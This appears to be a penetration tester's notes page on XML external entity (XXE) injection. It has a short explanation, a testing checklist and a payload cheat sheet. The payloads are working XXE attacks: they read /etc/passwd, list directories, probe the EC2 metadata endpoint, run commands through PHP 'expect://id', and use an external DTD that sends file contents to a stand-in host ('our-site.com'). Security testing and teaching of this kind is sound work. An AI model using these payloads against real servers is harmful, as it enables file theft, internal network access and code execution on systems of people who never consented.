XXE (XML external entity) injection
What is it?
XML External Entity (XXE) vulnerabilities occur when an application processes XML input that includes a reference to an external entity. This vulnerability can occur in any technology that parses XML. By exploiting an XXE vulnerability, an attacker can read local files on the server, interact with internal systems, or conduct denial of service attacks.
A simple example
A vulnerable application might parse XML input from a user without disabling external entities. An attacker could then send XML like the following:
<!DOCTYPE foo [ <!ENTITY xxe SYSTEM "file:///etc/passwd"> ]>
<foo>&xxe;</foo>
In this case, the XML parser will replace &xxe;
with the contents of the /etc/passwd
file and include it in the output.
XXE can often lead to:
Disclosure of internal files
Server Side Request Forgery (SSRF)
Denial of Service
Remote Code Execution in some rare cases
Other learning resources:
PortSwigger: https://portswigger.net/web-security/xxe
Writeups:
Checklist
Objective
Attack surface discovery
Test with the header
Content-Type: application/xml
Verify working XML payloads that can be adapted to deliver exploits
Locate internal DTDs
Testing
Test for external entities with a simple non-malicious payload
Test for external entities with an available file (e.g. for Linux /etc/passwd)
Test for external entities with an available endpoint you control (e.g. collaborator or webhook.site)
Test for external entities with other available endpoints
EC2 metadata endpoint
http://169.254.169.254/latest/meta-data
Test filters and restrictions
Trigger error messages to exfiltrate information
Test for denial of service
Test for code execution
Impact
Can we read sensitive files?
Configuration files
System files
SQLite files
SSH keys
Can we exfiltrate sensitive information?
Can we achieve code execution?
Exploitation
Sources
My pentest notes
PortSwigger
PayloadsAllTheThings
Detect XXE
<!--?xml version="1.0" ?-->
<!DOCTYPE foo [<!ENTITY xxe "test"> ]>
<foo>
<bar>&xxe;</bar>
</foo>
Include files
Note: You might need "file:///etc/passwd"
<!--?xml version="1.0" ?-->
<!DOCTYPE foo [<!ENTITY xxe SYSTEM "/etc/passwd"> ]>
<foo>
<bar>&xxe;</bar>
</foo>
List files: Note: Restricted to Java applications
<!--?xml version="1.0" ?-->
<!DOCTYPE aa[<!ELEMENT bb ANY>
<!ENTITY xxe SYSTEM "file:///">]>
<foo>
<bar>&xxe;</bar>
</foo>
Out-of-band:
<!--?xml version="1.0" ?-->
<!DOCTYPE foo [<!ENTITY xxe SYSTEM "http://collaborator"> ]>
<foo>
<bar>&xxe;</bar>
</foo>
Parameter entities:
<!DOCTYPE ase [ <!ENTITY % xxe SYSTEM "http://collaborator"> %xxe; ]>
Load an external DTD:
<!ENTITY % file SYSTEM "file:///etc/passwd">
<!ENTITY % eval "<!ENTITY % exfiltrate SYSTEM 'http://our-site.com/?x=%file;'>">
%eval;
%exfiltrate;
Execute code Note: Only works in the PHP 'expect' module is available
<?xml version="1.0" encoding="ISO-8859-1"?>
<!DOCTYPE foo [ <!ELEMENT foo ANY >
<!ENTITY xxe SYSTEM "expect://id" >]>
<foo>
<bar>&xxe;</bar>
</foo>
Include XML as a parameter value
param=<foo xmlns:xi="http://www.w3.org/2001/XInclude">
<xi:include parse="text" href="file:///etc/passwd"/>
</foo>
Other sources
Fuzzing for XXE https://github.com/xmendez/wfuzz/blob/master/wordlist/Injections/XML.txt
Fuzzing for local DTDs https://github.com/GoSecure/dtd-finder/tree/master/list
Last updated
Was this helpful?